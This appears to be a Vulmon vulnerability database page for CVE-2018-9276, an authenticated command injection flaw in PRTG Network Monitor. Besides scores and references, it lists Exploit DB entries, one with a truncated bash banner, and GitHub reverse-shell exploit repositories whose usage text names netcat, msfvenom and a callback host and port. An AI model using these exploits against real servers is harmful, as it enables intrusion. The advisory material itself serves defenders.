Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact
9
CVSSv2

CVE-2018-9276

Published: 02/07/2018 Updated: 25/04/2023
CVSS v2 Base Score: 9 | Impact Score: 10 | Exploitability Score: 8
CVSS v3 Base Score: 7.2 | Impact Score: 5.9 | Exploitability Score: 1.2
VMScore: 906
Vector: AV:N/AC:L/Au:S/C:C/I:C/A:C
Subscribe to Paessler

Vulnerability Summary

An issue exists in PRTG Network Monitor prior to 18.2.39. An attacker who has access to the PRTG System Administrator web console with administrative privileges can exploit an OS command injection vulnerability (both on the server and on devices) by sending malformed parameters in sensor or notification management scenarios.

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

paessler prtg network monitor

Exploits

Exploit DB: PRTG Network Monitor 18.2.38 - Authenticated Remote Code Execution
#!/bin/bash echo -e "\n\e[00;33m[+]#########################################################################[+] \e[00m" echo -e "\e[00;32m[*] Authenticated PRTG network Monitor remote code execution [*] \e[00m" echo -e "\e[00;33m[+]#########################################################################[+] \e[00m" echo -e "\e[00;32m ...
Exploit DB: PRTG Command Injection
PRTG versions prior to 18239 suffer from a command execution vulnerability ...
Exploit DB: PRTG Network Monitor 18.2.38 Remote Code Execution
PRTG Network Monitor version 18238 authenticated remote code execution exploit ...

Github Repositories

https://github.com/A1vinSmith/CVE-2018-9276

CVE-2018-9276 PRTG < 18.2.39 Reverse Shell (Python3 support)

CVE-2018-9276 Authenticated Command Injection CVE-2018-9276 PRTG &lt; 18239 Reverse Shell (Python3 support) Dependancies Impacket (python3 version) Netcat Msfvenom Usage git clone githubcom/A1vinSmith/CVE-2018-9276git /exploitpy -i targetIP -p targetPort --lhost hostIP --lport hostPort --user user --password pass The

https://github.com/wildkindcc/CVE-2018-9276

CVE-2018-9276 PRTG < 18.2.39 Authenticated Command Injection (Reverse Shell)

CVE-2018-9276 PRTG &lt; 18239 Authenticated Command Injection (Reverse Shell) nvdnistgov/vuln/detail/CVE-2018-9276 Improved version of an exploit written by githubcom/M4LV0 I used the POST data from their script but just made it more reliable as I didnt have much success with it Payload delivery is essentially smb_delivery Impacket serves up a dll

References

CWE-78http://packetstormsecurity.com/files/148334/PRTG-Command-Injection.htmlhttp://www.securityfocus.com/archive/1/542103/100/0/threadedhttps://www.exploit-db.com/exploits/46527/http://packetstormsecurity.com/files/161183/PRTG-Network-Monitor-Remote-Code-Execution.htmlhttps://nvd.nist.govhttps://github.com/A1vinSmith/CVE-2018-9276https://www.exploit-db.com/exploits/46527
CVSSv2
CVSSv2
CVSSv3
VMScore
Recommendations:
deserializationCVE-2024-4040cross-site scriptingCVE-2023-25790CVE-2024-2961XML external entityCVE-2024-26926CVE-2024-32806CVE-2024-32711
Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook